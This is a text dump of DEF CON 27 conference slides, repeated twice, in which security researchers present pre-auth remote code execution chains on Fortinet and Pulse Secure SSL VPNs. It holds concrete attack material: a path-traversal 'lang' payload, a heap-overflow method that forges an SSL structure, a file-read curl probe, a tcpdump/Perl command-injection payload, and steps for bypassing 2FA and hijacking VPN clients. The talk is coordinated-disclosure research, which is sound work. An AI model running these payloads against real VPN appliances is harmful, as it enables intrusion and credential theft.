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Infiltrating Corporate Intranet
Like NSA
Pre-auth RCE on Leading SSL VPNs
Orange Tsai (@orange_8361)
Meh Chang (@mehqq_)
Orange Tsai
• Principal security researcher at DEVCORE
• Captain of HITCON CTF team
• 0day researcher, focusing on
Web/Application security
Meh Chang
• Security researcher at DEVCORE
• HITCON & 217 CTF team
• Focus on binary exploitation
Highlights today
• Pre-auth root RCE exploit chain on Fortinet SSL VPN
• Hard-core binary exploitation
• Magic backdoor
• Pre-auth root RCE exploit chain on Pulse Secure SSL VPN
• Out-of-box web exploitation
• Highest bug bounty from Twitter ever
• New attack surface to compromise back all your VPN clients
• Introduction
• Jailbreak the SSL VPN
• Attack vectors
• Case studies & Demos
• Weaponize the SSL VPN
• Recommendations
• Trusted by large corporations to protect their assets
• Work with any network environments and firewalls
• Clientless, a web browser can do everything!
SSL VPNBrowser
What if your trusted SSL VPN
is insecure?
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Why focusing on SSL VPN
1. Important corporate assets but a blind-spot
2. Widely used by corporations of all sizes
3. Only few SSL VPN vendors dominate the market
4. Direct Intranet access and must be exposed to outside
Even NSA is hunting bugs on
Think about Equation Group leaks
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
They are usually forgotten
A silent-fix case
• We accidentally found a pre-auth RCE on Palo Alto SSL VPN
during our Red Team assessment
• A silent fixed 1-day:
• No CVE
• No advisory
• No official announcement
Hacking Uber as showcase
Response from Palo Alto PSIRT
Palo Alto Networks does follow coordinated vulnerability disclosure for
security vulnerabilities that are reported to us by external researchers.
We do not CVE items found internally and fixed. This issue was previously
fixed, but if you find something in a current version, please let us know.
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
High severity CVE statistics
17 13 6
Cisco F5 Palo Alto Citrix Fortinet Pulse Secure
We focus on…
• Pulse Secure SSL VPN
• More than 50,000+ servers operating on the Internet
• Trusted by large corporations, service providers and government
• Fortigate SSL VPN
• More than 480,000+ servers operating on the Internet
• Prevalent among medium-sized enterprises
Let's start hacking
Difficulties for kick-starting
• SSL VPN is a black box and closed source appliance
• All-in-one & Build their own architecture stacks from scratch
• Only restricted shell provided
• Jailbreak is the prerequisite for further researches
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Jailbreak the SSL VPN
• We are not hardware guys :(
• So we look into the virtual image first
• Analyzing virtual images
1. Typical virtual images
2. Encrypted virtual images
Typical virtual images
• If there is no LILO or GRUB password protected, we can just enter
the Single-User mode
• Mount the .VMDK on your Linux box and modify the filesystem
• /etc/crontab
• /etc/ld.so.conf
• /etc/passwd
• Many ways…
What if the disk has been
Encrypted virtual images
• Stage 1
• Stage 2
vmlinuz kernel
• zImagea
• bzImage
• vmlinuz kernel
• Level - Hard
• Reverse engineering for the win!
• /sbin/init
• Level - Easy
• Memory forensics for the win!
The booting process
The booting process
Find the vital point
Memory Forensics
In-memory patch
Memory Patch
Once we press the Enter…
Digging at a correct place
Attack vectors
• WebVPN
• Native script language extensions
• Multi-layered architecture problems
• A convenient proxy feature – Portable & Clientless
• Proxy all kinds of traffics through the web browser
• Supports various protocols
• Handles various web resources
• WebSocket, JavaScript, Flash, Java Applet …
WebVPN implementation
• Build from scratch
• Protocols, web resources handling are prone to memory bugs
• Requires high security awareness
• Debug function
• Logging sensitive data
• Information exposed
WebVPN implementation
• Modify from an open source project
• Copy the code, copy the bugs
• Hard to maintain & update & patch
• Call existing libraries
• Neglect to update
• Libcurl (2008), Libxml (2009)
• Most SSL VPNs have their own native script
language extensions
• En/Decoding in C/C++
• Type confusion between
Web Stack
F5 Networks PHP / C (Apache extension)
Cisco Lua / C (self-implemented server)
Pulse Secure Perl / C++ (self-implemented server)
Fortigate Nginx / C (Apache extension)
Palo Alto PHP / C (AppWeb extension)
Citrix PHP / C (self-implemented server)
Native script language
En/Decoding in C/C++
• String operation is always difficult for C language
• Buffer size calculation
• Dangerous functions
• Misunderstood functions
ret = snprintf(buf, buf_size, format, …);
left_buf_size = buf_size – ret;
Type confusion
• Type seems the same but …
• Perl string or C string?
• What TYPE is it?
my ($var) = @_;
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Multi-layered architecture
• Inconsistency between each architecture layer
• Failed patterns
• Reverse proxy + Java web = Fail
• Breaking Parser Logic by Orange Tsai from Black Hat USA 2018
• Customized(C/C++) web server + RESTful API backend
Failed Patterns
• ACL bypass on customized C webserver + RESTful backend
• Abuse Regular Expression greedy mode to bypass path check
• Dispatched to backend PHP engine and access privileged pages
Case studies
Pre-auth remote code execution on Fortigate SSL VPN
Pre-auth remote code execution on Pulse Secure SSL VPN
All the CVEs mentioned below have been reported and patched
by Fortinet, Pulse Secure and Twitter
Fortigate SSL VPN
• All programs and configurations compiled into /
• About 500 MB, stripped idb with 85k functions
• Plenty of function tables
• Customized web daemons
• Based on apache since 2002
• Self-implemented apache module
Fortigate web interface
Worth mentioning bugs
• Pre-auth RCE chain
• CVE-2018-13379: Pre-auth arbitrary file reading
• CVE-2018-13382: Post-auth heap overflow
• The magic backdoor
• CVE-2018-13383: Modify any user’s password with a magic key
Arbitrary file reading
• A function reading language json files for users
• Concatenate strings directly
• No ../ filter
• Limited file extension
snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);
snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);
Arbitrary file reading
• Utilize the feature of snprintf
• The snprintf() and vsnprintf() functions will write at most size-1 of
the characters printed into the output string
• Appended file extension can be stripped!
An SSL VPN mystery
Appears in many products …
Excessively detailed session file
• Session token
• IP address
• User name
• Plaintext password
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Heap overflow vulnerability
• HTTP proxy
• Perform URL rewriting
• JavaScript parsing
• memcpy to a 0x2000 heap buffer without length check
memcpy(buffer, js_url, js_url_len);
Exploitation obstacles
• Destabilizing factors of heap
• Multiple connection handling with epoll()
• Main process and libraries use the same heap – Jemalloc
• Regularly triggered internal operations unrelated to connection
• Apache additional memory management
• No free() unless connection ends
Jemalloc allocator limitation
• Centralize small objects
• Stores small regions in
corresponding runs
• Reduce interference between
small and large objects
• Limit target options
reg 0
reg 1
reg 2
reg N
reg 0
reg 1
reg N
Program received signal SIGSEGV, Segmentation fault.
0x00007fb908d12a77 in SSL_do_handshake () from /fortidev4-
2: /x $rax = 0x41414141
1: x/i $pc
=> 0x7fb908d12a77 <SSL_do_handshake+23>: callq *0x60(%rax)
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
SSL structure (OpenSSL)
• Stores information of each SSL connection
• Ideal target
Allocation triggered easily
Size close to JavaScript buffer
Nearby JavaScript buffer with regular offset (k + N pages)
Useful structure members
Useful structure members
typedef struct ssl_st SSL;
struct ssl_st {
int version;
const SSL_METHOD *method; //func table
int (*handshake_func) (SSL *);
Mess up connections
• Overflow SSL structure
• Establish massive connections
• Lots of normal requests
• One overflow request
Normal request
Overflow request
Normal request
Normal request
Exploit between connections
Connection 1
Connection 2
Connection 3
Original SSL structure
version method
… …
Trigger JavaScript Parsing
version method
… …
Overflow SSL structure
version method
memcpy(buffer, js_url, js_url_len);
… …
… …
version method
… …
Forge SSL structure
version method
JS Buffer SSL
… …
Enjoy your shell!
• Send fuzzy connections to meet the condition
• Daemon may crash multiple times
• Fortigate owns a reliable watchdog!
• Get a shell in 1~2 minutes
Make your life easier
Find another Door to get in
MAGIC backdoor
• A “magic” parameter
• Secret key for reset password
• Designed for updating outdated password
• but lack of authentication
Pop a root shell from the only exposed HTTPS port
Pulse Secure SSL VPN
• Pulse Secure was formed a divestiture of Juniper Networks
• Customized web server and architecture stack
• Perl enthusiast - numerous Perl extensions in C++
• LD_PRELOAD all processes with:
• libsafe.so - Detect and protect against stack smashing attacks
• libpreload.so - User-mode networking system call hooks
Vulnerabilities we found
• CVE-2019-11510 - Pre-auth arbitrary file reading
• CVE-2019-11538 - Post-auth NFS arbitrary file reading
• CVE-2019-11508 - Post-auth NFS arbitrary file writing
• CVE-2019-11542 - Post-auth stack buffer overflow
• CVE-2019-11539 - Post-auth command injection
• CVE-2019-11540 - XSSI session hijacking
• CVE-2019-11507 - Cross-site scripting
Arbitrary file reading
• CVE-2019-11510 – Webserver-level pre-auth file reading
• Pulse Secure has introduced a new feature HTML5 Access since
SSL VPN version 8.2
• A new solution to access Telnet, SSH and RDP via browsers
• To handle static resources, Pulse Secure created a new IF-case to
widen the original strict path validation
Am I affected by this vuln?
• Probably YES!
• All un-patched versions are vulnerable except the End-of-Life 8.1 code
$ curl -I 'https://sslvpn/dana-na///css/ds.js'
HTTP/1.1 400 Invalid Path
$ curl -I 'https://sslvpn/dana-na///css/ds.js?/dana/html5acc/guacamole/'
HTTP/1.1 200 OK
What can we extract?
1. Private keys and system configuration(LDAP, RADIUS and SAML…)
2. Hashed user passwords(md5_crypt)
3. Sensitive cookies in WebVPN(ex: Google, Dropbox and iCloud…)
4. Cached user plaintext passwords
What can we extract?
1. Private keys and system configuration(LDAP, RADIUS and SAML…)
2. Hashed user passwords(md5_crypt)
3. Sensitive cookies in WebVPN(ex: Google, Dropbox and iCloud…)
4. Cached user plaintext passwords
Command Injection
• CVE-2019-11539 – Post-auth Command Injection
sub tcpdump_options_syntax_check {
my $options = shift;
return $options if system("$TCPDUMP_COMMAND -d $options >/dev/null 2>&1") == 0;
return undef;
Command Injection
Pulse Secure hardenings
• Several hardenings on Pulse Secure SSL VPN…
1. System integrity check
2. Read-only filesystem(only /data are writable)
3. The DSSafe.pm as a safeguard protects Perl from dangerous
The Perl gatekeeper
• DSSafe.pm
• A Perl-C extension hooks several Perl functions such as:
• system, open, popen, exec, backstick…
• Command-line syntax validation
• Disallow numerous bad characters - [&*(){}[]`;|?n~<>]
• Re-implement the Linux I/O redirections in Perl
Failed argument injection :(
• TCPDUMP is too old(v3.9.4, Sept 2005) to support post-rotate-command
• Observed Pulse Secure caches Perl template result in:
• /data/runtime/tmp/tt/*.thtml.ttc
• No way to generate a polyglot file in both Perl and PCAP format
Usage: tcpdump [-aAdDeflLnNOpqRStuUvxX] [-c count] [-C file_size]
[-E algo:secret] [-F file] [-i interface] [-M secret]
[-r file] [-s snaplen] [-T type] [-w pcap-file]
[-W filecount] [-z postrotate-command]
[-y datalinktype] [-Z user] [expression]
/usr/sbin/tcpdump –help>_
Time to dig deeper
• Dig into DSSafe.pm more deeply, we found a flaw in
command line I/O redirection parsing
use DSSafe;
system("tcpdump -d $options >/dev/null 2>&1");
system("tcpdump -d -h >file >/dev/null 2>&1"); # `file` not found
system("tcpdump -d -h >file < >/dev/null 2>&1"); # `file` created
Think out of the box
STDOUT is uncontrollable
Could we write a valid Perl by just STDERR?
Think out of the box
$ tcpdump -d -r '123'
tcpdump: 123: No such file or directory
$ tcpdump -d -r '123' 2>&1 | perl -
syntax error at - line 1, near "123:"
Execution of - aborted due to compilation errors.
Think out of the box
$ tcpdump -d -r 'print 123#'
tcpdump: print 123#: No such file or directory
$ tcpdump -d -r 'print 123#' 2>&1 | perl –
tcpdump: print 123#: No such file or directory
GOTO label Comment
Perl 101
/usr/sbin/tcpdump -d
RCE Exploit
tcpdump: $x="ls",system$x#: No such file...
STDERR(2) > /data/runtime/tmp/tt/setcookie.thtml.ttc
/usr/sbin/tcpdump -d
/usr/sbin/tcpdump -d
tcpdump: $x="ls",system$x#: No such file...
STDERR(2) > /data/runtime/tmp/tt/setcookie.thtml.ttc
/usr/sbin/tcpdump -d
tcpdump: $x="ls",system$x#: No such file...
STDERR(2) > /data/runtime/tmp/tt/setcookie.thtml.ttc
/usr/sbin/tcpdump -d
boot bin home lib64 mnt opt proc sys usr var
data etc lib lost+found modules pkg sbin tmp
curl https://sslvpn/dana-na/auth/setcookie.cgi>_
Response from Pulse Secure
• Pulse Secure is committed to providing customers with the best Secure Access Solutions
for Hybrid IT- SSL VPN and takes security vulnerabilities very seriously
• Timeline:
• This issue was reported to Pulse Secure PSIRT Team on March 22, 2019
• Pulse Secure fixes all reported issues in short span of time and published the security advisory SA44101 on
April 24, 2019 with all software updates that address the vulnerabilities for unpatched versions
• Pulse Secure assigned the CVE’s to all reported vulnerabilities and updated the advisory on April 25, 2019
• Pulse Secure sent out a reminder to all customers to apply the security patches on June 26, 2019
• Pulse Secure would like to thank DEVCORE Team for reporting this vulnerability to Pulse
Secure and working toward a coordinated disclosure
Hacking Twitter
• We keep monitoring large corporations who use Pulse Secure
by fetching the exposed version and Twitter is one of them
• Pulse Secure released the patch on April 25, 2019 and we wait
30 days for Twitter to upgrade the SSL VPN
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Twitter is vulnerable
$ ./pulse_check.py <mask>.twitter.com
[*] Date = Thu, 13 Dec 2018 05:34:28 GMT
[*] Version =
[*] OK, <mask>.twittr.com is vulnerable
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Two-factor authentication
• Bypass the two-factor authentication
1. Although we can extract cached passwords in plaintext from
/lmdb/dataa/data.mdb, we still can not do anything :(
2. Observe Twitter enabled the Roaming Session (enabled by default)
3. Download the /lmdb/randomVal/data.mdb to dump all session
4. Forge the user and reuse the session to bypass the 2FA
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Restricted admin interface
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
We only have the hash of admin password in
sha256(md5_crypt(salt, …))
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns
Make the red team more
Weaponize the SSL VPN
• The old-school method
• Watering hole / Drive by download
• Replace SSL VPN agent installer
• Man-in-the-middle attack
Weaponize the SSL VPN
• The new method to compromise all VPN clients
• Leverage the logon script feature!
• Execute specified program once the VPN client connected
• Almost every SSL VPN supports this feature
• Support Windows, Linux and Mac
Compromise all connected VPN clients
• Client certificate authentication
• Multi factors authentication
• Enable full log audit (Be sure to send to out-bound server)
• Subscribe to the vendor's security advisory and keep system

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DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like nsa pre auth rce on leading ssl vpns

  • 1. Infiltrating Corporate Intranet Like NSA Pre-auth RCE on Leading SSL VPNs Orange Tsai (@orange_8361) Meh Chang (@mehqq_)
  • 2. Orange Tsai • Principal security researcher at DEVCORE • Captain of HITCON CTF team • 0day researcher, focusing on Web/Application security orange_8361
  • 3. Meh Chang mehqq_ • Security researcher at DEVCORE • HITCON & 217 CTF team • Focus on binary exploitation
  • 4. Highlights today • Pre-auth root RCE exploit chain on Fortinet SSL VPN • Hard-core binary exploitation • Magic backdoor • Pre-auth root RCE exploit chain on Pulse Secure SSL VPN • Out-of-box web exploitation • Highest bug bounty from Twitter ever • New attack surface to compromise back all your VPN clients
  • 5. Agenda • Introduction • Jailbreak the SSL VPN • Attack vectors • Case studies & Demos • Weaponize the SSL VPN • Recommendations
  • 6. SSL VPN • Trusted by large corporations to protect their assets • Work with any network environments and firewalls • Clientless, a web browser can do everything! SSL VPNBrowser SSL/TLS Intranet
  • 7. What if your trusted SSL VPN is insecure?
  • 9. Why focusing on SSL VPN 1. Important corporate assets but a blind-spot 2. Widely used by corporations of all sizes 3. Only few SSL VPN vendors dominate the market 4. Direct Intranet access and must be exposed to outside
  • 10. Even NSA is hunting bugs on SSL VPN Think about Equation Group leaks
  • 15. They are usually forgotten
  • 16. A silent-fix case • We accidentally found a pre-auth RCE on Palo Alto SSL VPN during our Red Team assessment • A silent fixed 1-day: • No CVE • No advisory • No official announcement
  • 17. Hacking Uber as showcase
  • 18. Response from Palo Alto PSIRT Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know.
  • 20. High severity CVE statistics 159 50 26 17 13 6 Cisco F5 Palo Alto Citrix Fortinet Pulse Secure https://nvd.nist.gov
  • 21. We focus on… • Pulse Secure SSL VPN • More than 50,000+ servers operating on the Internet • Trusted by large corporations, service providers and government entities • Fortigate SSL VPN • More than 480,000+ servers operating on the Internet • Prevalent among medium-sized enterprises
  • 23. Difficulties for kick-starting • SSL VPN is a black box and closed source appliance • All-in-one & Build their own architecture stacks from scratch • Only restricted shell provided • Jailbreak is the prerequisite for further researches
  • 25. Jailbreak the SSL VPN • We are not hardware guys :( • So we look into the virtual image first • Analyzing virtual images 1. Typical virtual images 2. Encrypted virtual images
  • 26. Typical virtual images • If there is no LILO or GRUB password protected, we can just enter the Single-User mode • Mount the .VMDK on your Linux box and modify the filesystem • /etc/crontab • /etc/ld.so.conf • /etc/passwd • Many ways…
  • 27. What if the disk has been encrypted?
  • 28. Encrypted virtual images BIOS/MBR LILO/GRUB • Stage 1 • Stage 2 vmlinuz kernel • zImagea • bzImage /sbin/init • vmlinuz kernel • Level - Hard • Reverse engineering for the win! • /sbin/init • Level - Easy • Memory forensics for the win!
  • 31. Find the vital point BIOS LILO Kernel /sbin/init /home/bin/dsconfig.pl Memory Forensics
  • 33. Once we press the Enter… BIOS LILO Kernel /sbin/init ///////////////bin/sh
  • 34. Digging at a correct place
  • 35. Attack vectors • WebVPN • Native script language extensions • Multi-layered architecture problems
  • 36. WebVPN • A convenient proxy feature – Portable & Clientless • Proxy all kinds of traffics through the web browser • Supports various protocols • HTTP, FTP, TELNET, SSH, SMB, RDP … • Handles various web resources • WebSocket, JavaScript, Flash, Java Applet …
  • 37. WebVPN implementation • Build from scratch • Protocols, web resources handling are prone to memory bugs • Requires high security awareness • Debug function • Logging sensitive data • Information exposed
  • 38. WebVPN implementation • Modify from an open source project • Copy the code, copy the bugs • Hard to maintain & update & patch • Call existing libraries • Neglect to update • Libcurl (2008), Libxml (2009)
  • 39. • Most SSL VPNs have their own native script language extensions • En/Decoding in C/C++ • Type confusion between languages Web Stack F5 Networks PHP / C (Apache extension) Cisco Lua / C (self-implemented server) Pulse Secure Perl / C++ (self-implemented server) Fortigate Nginx / C (Apache extension) Palo Alto PHP / C (AppWeb extension) Citrix PHP / C (self-implemented server) Native script language extensions
  • 40. En/Decoding in C/C++ • String operation is always difficult for C language • Buffer size calculation • Dangerous functions • Misunderstood functions ret = snprintf(buf, buf_size, format, …); left_buf_size = buf_size – ret;
  • 41. Type confusion • Type seems the same but … • Perl string or C string? • What TYPE is it? my ($var) = @_; EXTENSION::C_function($var);
  • 43. Multi-layered architecture problems • Inconsistency between each architecture layer • Failed patterns • Reverse proxy + Java web = Fail • Breaking Parser Logic by Orange Tsai from Black Hat USA 2018 • Customized(C/C++) web server + RESTful API backend
  • 44. Failed Patterns https://sslvpn/public/images/x/front_x/../../../../some.php • ACL bypass on customized C webserver + RESTful backend • Abuse Regular Expression greedy mode to bypass path check ^/public/images/.+/(front|background)_.+ • Dispatched to backend PHP engine and access privileged pages
  • 45. Case studies Pre-auth remote code execution on Fortigate SSL VPN Pre-auth remote code execution on Pulse Secure SSL VPN
  • 46. Disclaimer All the CVEs mentioned below have been reported and patched by Fortinet, Pulse Secure and Twitter
  • 47. Fortigate SSL VPN • All programs and configurations compiled into / • About 500 MB, stripped idb with 85k functions • Plenty of function tables • Customized web daemons • Based on apache since 2002 • Self-implemented apache module /bin/init
  • 49. Worth mentioning bugs • Pre-auth RCE chain • CVE-2018-13379: Pre-auth arbitrary file reading • CVE-2018-13382: Post-auth heap overflow • The magic backdoor • CVE-2018-13383: Modify any user’s password with a magic key
  • 50. Arbitrary file reading • A function reading language json files for users • Concatenate strings directly • No ../ filter • Limited file extension snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);
  • 51. snprintf(s, 0x40, "/migadmin/lang/%s.json", lang); Arbitrary file reading • Utilize the feature of snprintf • The snprintf() and vsnprintf() functions will write at most size-1 of the characters printed into the output string • Appended file extension can be stripped! lang=/../../../..//////////////////////////////bin/sh/migadmin/lang//../../../..//////////////////////////////bin/sh.json 0x40
  • 52. An SSL VPN mystery Appears in many products …
  • 53. Excessively detailed session file • • Session token • IP address • User name • Plaintext password /dev/cmdb/sslvpn_websession
  • 58. Heap overflow vulnerability • HTTP proxy • Perform URL rewriting • JavaScript parsing • memcpy to a 0x2000 heap buffer without length check memcpy(buffer, js_url, js_url_len);
  • 59. Exploitation obstacles • Destabilizing factors of heap • Multiple connection handling with epoll() • Main process and libraries use the same heap – Jemalloc • Regularly triggered internal operations unrelated to connection • Apache additional memory management • No free() unless connection ends
  • 60. Jemalloc allocator limitation • Centralize small objects • Stores small regions in corresponding runs • Reduce interference between small and large objects • Limit target options header bitmap reg 0 reg 1 reg 2 … reg N header bitmap reg 0 reg 1 … reg N run (0x20) run (0x30)
  • 61. Surprise! Program received signal SIGSEGV, Segmentation fault. 0x00007fb908d12a77 in SSL_do_handshake () from /fortidev4- x86_64/lib/libssl.so.1.1 2: /x $rax = 0x41414141 1: x/i $pc => 0x7fb908d12a77 <SSL_do_handshake+23>: callq *0x60(%rax) (gdb)
  • 63. SSL structure (OpenSSL) • Stores information of each SSL connection • Ideal target Allocation triggered easily Size close to JavaScript buffer Nearby JavaScript buffer with regular offset (k + N pages) Useful structure members
  • 64. Useful structure members typedef struct ssl_st SSL; struct ssl_st { int version; const SSL_METHOD *method; //func table … int (*handshake_func) (SSL *); };
  • 65. Mess up connections • Overflow SSL structure • Establish massive connections • Lots of normal requests • One overflow request Fortigate SSL VPN Massive connections Normal request Overflow request Normal request Normal request Fuzzer
  • 66. Exploit between connections HEAP MEMORY SSL SSL SSL Connection 1 Connection 2 Connection 3 LOW HIGH
  • 67. Original SSL structure HEAP MEMORY SSL SSL SSL version method *handshake _func ssl_accept() … … LOW HIGH
  • 68. Trigger JavaScript Parsing HEAP MEMORY SSL SSL SSL version method *handshake _func ssl_accept() … … LOW HIGH JS Buffer Allocate
  • 71. LOW HIGH Forge SSL structure HEAP MEMORY SSL SSL version method system() JS Buffer SSL *handshake _func … …
  • 72. Enjoy your shell! • Send fuzzy connections to meet the condition • Daemon may crash multiple times • Fortigate owns a reliable watchdog! • Get a shell in 1~2 minutes
  • 73. Make your life easier Find another Door to get in
  • 74. MAGIC backdoor • A “magic” parameter • Secret key for reset password • Designed for updating outdated password • but lack of authentication
  • 75. Demo Pop a root shell from the only exposed HTTPS port
  • 77. Pulse Secure SSL VPN • Pulse Secure was formed a divestiture of Juniper Networks • Customized web server and architecture stack • Perl enthusiast - numerous Perl extensions in C++ • LD_PRELOAD all processes with: • libsafe.so - Detect and protect against stack smashing attacks • libpreload.so - User-mode networking system call hooks
  • 78. Vulnerabilities we found • CVE-2019-11510 - Pre-auth arbitrary file reading • CVE-2019-11538 - Post-auth NFS arbitrary file reading • CVE-2019-11508 - Post-auth NFS arbitrary file writing • CVE-2019-11542 - Post-auth stack buffer overflow • CVE-2019-11539 - Post-auth command injection • CVE-2019-11540 - XSSI session hijacking • CVE-2019-11507 - Cross-site scripting
  • 79. Arbitrary file reading • CVE-2019-11510 – Webserver-level pre-auth file reading • Pulse Secure has introduced a new feature HTML5 Access since SSL VPN version 8.2 • A new solution to access Telnet, SSH and RDP via browsers • To handle static resources, Pulse Secure created a new IF-case to widen the original strict path validation
  • 80. Am I affected by this vuln? • Probably YES! • All un-patched versions are vulnerable except the End-of-Life 8.1 code $ curl -I 'https://sslvpn/dana-na///css/ds.js' HTTP/1.1 400 Invalid Path $ curl -I 'https://sslvpn/dana-na///css/ds.js?/dana/html5acc/guacamole/' HTTP/1.1 200 OK
  • 81. What can we extract? 1. Private keys and system configuration(LDAP, RADIUS and SAML…) 2. Hashed user passwords(md5_crypt) 3. Sensitive cookies in WebVPN(ex: Google, Dropbox and iCloud…) 4. Cached user plaintext passwords
  • 82. What can we extract? 1. Private keys and system configuration(LDAP, RADIUS and SAML…) 2. Hashed user passwords(md5_crypt) 3. Sensitive cookies in WebVPN(ex: Google, Dropbox and iCloud…) 4. Cached user plaintext passwords
  • 83. Command Injection • CVE-2019-11539 – Post-auth Command Injection sub tcpdump_options_syntax_check { my $options = shift; return $options if system("$TCPDUMP_COMMAND -d $options >/dev/null 2>&1") == 0; return undef; } /dana-admin/diag/diag.cgi
  • 85. Pulse Secure hardenings • Several hardenings on Pulse Secure SSL VPN… 1. System integrity check 2. Read-only filesystem(only /data are writable) 3. The DSSafe.pm as a safeguard protects Perl from dangerous operations
  • 86. The Perl gatekeeper • DSSafe.pm • A Perl-C extension hooks several Perl functions such as: • system, open, popen, exec, backstick… • Command-line syntax validation • Disallow numerous bad characters - [&*(){}[]`;|?n~<>] • Re-implement the Linux I/O redirections in Perl
  • 87. Failed argument injection :( • TCPDUMP is too old(v3.9.4, Sept 2005) to support post-rotate-command • Observed Pulse Secure caches Perl template result in: • /data/runtime/tmp/tt/*.thtml.ttc • No way to generate a polyglot file in both Perl and PCAP format Usage: tcpdump [-aAdDeflLnNOpqRStuUvxX] [-c count] [-C file_size] [-E algo:secret] [-F file] [-i interface] [-M secret] [-r file] [-s snaplen] [-T type] [-w pcap-file] [-W filecount] [-z postrotate-command] [-y datalinktype] [-Z user] [expression] /usr/sbin/tcpdump –help>_
  • 88. Time to dig deeper • Dig into DSSafe.pm more deeply, we found a flaw in command line I/O redirection parsing use DSSafe; system("tcpdump -d $options >/dev/null 2>&1"); system("tcpdump -d -h >file >/dev/null 2>&1"); # `file` not found system("tcpdump -d -h >file < >/dev/null 2>&1"); # `file` created dssafe_example.pl
  • 89. Think out of the box STDOUT is uncontrollable Could we write a valid Perl by just STDERR?
  • 90. Think out of the box $ tcpdump -d -r '123' tcpdump: 123: No such file or directory $ tcpdump -d -r '123' 2>&1 | perl - syntax error at - line 1, near "123:" Execution of - aborted due to compilation errors.
  • 91. Think out of the box $ tcpdump -d -r 'print 123#' tcpdump: print 123#: No such file or directory $ tcpdump -d -r 'print 123#' 2>&1 | perl – 123
  • 92. tcpdump: print 123#: No such file or directory Code GOTO label Comment Perl 101
  • 94. tcpdump: $x="ls",system$x#: No such file... STDERR(2) > /data/runtime/tmp/tt/setcookie.thtml.ttc 1 /usr/sbin/tcpdump -d -r'$x="ls",system$x#' 2>/data/runtime/tmp/tt/setcookie.thtml.ttc < >/dev/null 2>&1
  • 97. /usr/sbin/tcpdump -d -r'$x="ls",system$x#' 2>/data/runtime/tmp/tt/setcookie.thtml.ttc < >/dev/null 2>&1 boot bin home lib64 mnt opt proc sys usr var data etc lib lost+found modules pkg sbin tmp ... curl https://sslvpn/dana-na/auth/setcookie.cgi>_
  • 98. Response from Pulse Secure • Pulse Secure is committed to providing customers with the best Secure Access Solutions for Hybrid IT- SSL VPN and takes security vulnerabilities very seriously • Timeline: • This issue was reported to Pulse Secure PSIRT Team on March 22, 2019 • Pulse Secure fixes all reported issues in short span of time and published the security advisory SA44101 on April 24, 2019 with all software updates that address the vulnerabilities for unpatched versions • Pulse Secure assigned the CVE’s to all reported vulnerabilities and updated the advisory on April 25, 2019 • Pulse Secure sent out a reminder to all customers to apply the security patches on June 26, 2019 • Pulse Secure would like to thank DEVCORE Team for reporting this vulnerability to Pulse Secure and working toward a coordinated disclosure
  • 99. Hacking Twitter • We keep monitoring large corporations who use Pulse Secure by fetching the exposed version and Twitter is one of them • Pulse Secure released the patch on April 25, 2019 and we wait 30 days for Twitter to upgrade the SSL VPN
  • 101. Twitter is vulnerable $ ./pulse_check.py <mask>.twitter.com [*] Date = Thu, 13 Dec 2018 05:34:28 GMT [*] Version = [*] OK, <mask>.twittr.com is vulnerable
  • 104. Two-factor authentication • Bypass the two-factor authentication 1. Although we can extract cached passwords in plaintext from /lmdb/dataa/data.mdb, we still can not do anything :( 2. Observe Twitter enabled the Roaming Session (enabled by default) 3. Download the /lmdb/randomVal/data.mdb to dump all session 4. Forge the user and reuse the session to bypass the 2FA
  • 109. However We only have the hash of admin password in sha256(md5_crypt(salt, …))
  • 116. Make the red team more Red
  • 117. Weaponize the SSL VPN • The old-school method • Watering hole / Drive by download • Replace SSL VPN agent installer • Man-in-the-middle attack
  • 118. Weaponize the SSL VPN • The new method to compromise all VPN clients • Leverage the logon script feature! • Execute specified program once the VPN client connected • Almost every SSL VPN supports this feature • Support Windows, Linux and Mac
  • 121. Recommendations • Client certificate authentication • Multi factors authentication • Enable full log audit (Be sure to send to out-bound server) • Subscribe to the vendor's security advisory and keep system updated!